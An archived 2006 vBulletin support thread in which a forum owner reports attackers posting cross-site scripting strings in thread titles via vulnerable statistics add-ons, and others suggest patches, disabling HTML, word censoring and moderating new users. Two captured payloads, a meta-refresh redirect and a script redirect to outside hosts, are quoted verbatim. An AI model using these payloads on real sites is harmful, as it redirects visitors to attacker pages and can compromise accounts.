vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB3 General Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=111)
-   -   My vbb Site getting hacked...help (https://vborg.vbsupport.ru/showthread.php?t=125713)

TorGa3iGhT 09-03-2006 05:18 PM
My vbb Site getting hacked...help
 
ok. so for the last two days I have been getting one or more people signing up on my vbulletin who post the following line in the title and body:

Code:
">"">>>><meta http-equiv="Refresh" content="0;url=http://clubplus.pl/"> """" >
once they post this, the website basically redirects to the website in the url.

i have been looking for where to turn the HTML off in the title,but I can't find it. Can someone help me out in stopping this from happening? are there any fixes anywhere out there to prevent this from happening?

I am running vbb 3.5.4. Thanks guys!

Guest190829 09-03-2006 05:21 PM
Hello,

That is from the following modification:

https://vborg.vbsupport.ru/showthread.php?t=93065

A fix has been applied by staff, so please update to the most recent version.

TorGa3iGhT 09-03-2006 05:36 PM
thanks....i'll give it a try..reading the thread now. BTW...is this the correct place to list something like this if it should happen again with something different? i couldn't find a place other than in off-topic to post this...

Guest190829 09-03-2006 05:40 PM
Well currently, this is the correct place. :)

TorGa3iGhT 09-03-2006 06:14 PM
ok...so I didn't have top x installed to begin with....i thought I did, but I actually have cyb top poster installed. could it be a similar problem?

Puck 24/7 09-03-2006 06:23 PM
This news should be shown on vb.org's main page.

Guest190829 09-03-2006 06:30 PM
You have html enabled on your forums? Sorry, I didn't read it correctly. But then that may be a vBulletin issue. I would disable HTML on your forums then...and I will take a look at the mod you mentioned right now...

TorGa3iGhT 09-03-2006 06:38 PM
naw, html wans't enabled. I found the fix for the cyb one as well...top x stats as well as the cyb advanced forum statistics both have this vulnerability. the new version of cyb advanced forum statistics also deals with this issue.

I installed the updated version over my old one, and it appears to have fixed the problem. I undeleted the hacked post, and it doesnt' redirect anymore, so apparently the new version works.

For anyone who has not yet installed the new version of top x stats or cyb advanced forum statistics, I suggest you do so, else your site may be vulnerable to this attack one day in the future.

Thanks for everyone's help!

Guest190829 09-03-2006 06:43 PM
Okay seems like that modification was patched about a week ago. Thanks for the info.

TorGa3iGhT 09-05-2006 03:52 PM
ok...well, i thought this fixed it...apparently it didn't. Even after I checked and double-checked the other day to fix it, it still isn't working. my site still redirects, but this time to a hacked page.

I just now deleted the thread and everyone now does not get redirected, EXCEPT my admin screen name. any ideas guys?

it redirected me to this site:
http://walnan.freehostia.com/

ok...i just disabled the cyb advanced forum statistics, and now it does not redirect me. so apparently the new update didn't fix it?

where can I check to see if html is disabled or not?

optrex 09-05-2006 04:19 PM
Have you let cyb know ???

TorGa3iGhT 09-05-2006 04:20 PM
i posted it in his thread....for this hack I mean...i dind't PM him or anything though

--------------
AHHHH!!! someone tried it AGAIN while i was sitting there blocking everything. luckily i disabled the plugin and nothing happened, but here's the line of text they used this time...i'm a lil scared to find out what that would have done, since it was executing a script file:

Code:
">"">>>><script>location="http://intikam.us/hck"</script> """" >

Phaedrus 09-06-2006 03:18 AM
You need to delete the Thread title when deleting the post... Edit it and make it so that the redirect isn't there anymore and this will end your admin being redirected. Somewhere you have HTML on...

roni1015 09-06-2006 02:18 PM
I've had this happen as well. What I don't understand is why people even bother doing this? It's the stupidest thing. What an enormous waste of their time to search out all these boards, register and then post this stupid title. All a person has to do is delete the stupid post and it's fixed. <sarcasm>Wow, those hackers are pretty smart, I know I'm impressed. </sarcasm> *rolling eyes* Sorry, just needed to rant there for a second about these little twits making our lives more difficult.

Anyway, I found a thread on here the other day about this where someone suggested to add that string they are using to the list of censored words and so I did that since it seemed like the quickest way to deal with this. So far, that has worked like a charm. I had one this morning actually, it ended up being a few of these ">"">> and then a whole bunch of these ************. So, it didn't work for them. Hehe.

optrex 09-06-2006 05:17 PM
Just moderate new users. They post as soon as they have activated the email, so the posts end up in a moderation queue. Then all you have to do is delete ;)

Adding words to a censored list will only stop this variant of attack, it wont stop html being used in the first place - therefore the vulnerability is still open !!!!!!

Phaedrus 09-06-2006 11:21 PM
Quote:
Originally Posted by optrex
Just moderate new users. They post as soon as they have activated the email, so the posts end up in a moderation queue. Then all you have to do is delete ;)

Adding words to a censored list will only stop this variant of attack, it wont stop html being used in the first place - therefore the vulnerability is still open !!!!!!
Or at least have it censor the carats >><<

Greek76 09-08-2006 04:16 PM
What if you add html phrases to your censors. Example maybe html, .exe, ect... That might actually work. I found the best way to stop stuff like this is set user registration to admin and pay attention to their email address if it looks fishy dont activate their account.


All times are GMT. The time now is 02:04 AM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01144 seconds
  • Memory Usage 1,749KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (2)bbcode_code_printable
  • (1)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (17)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete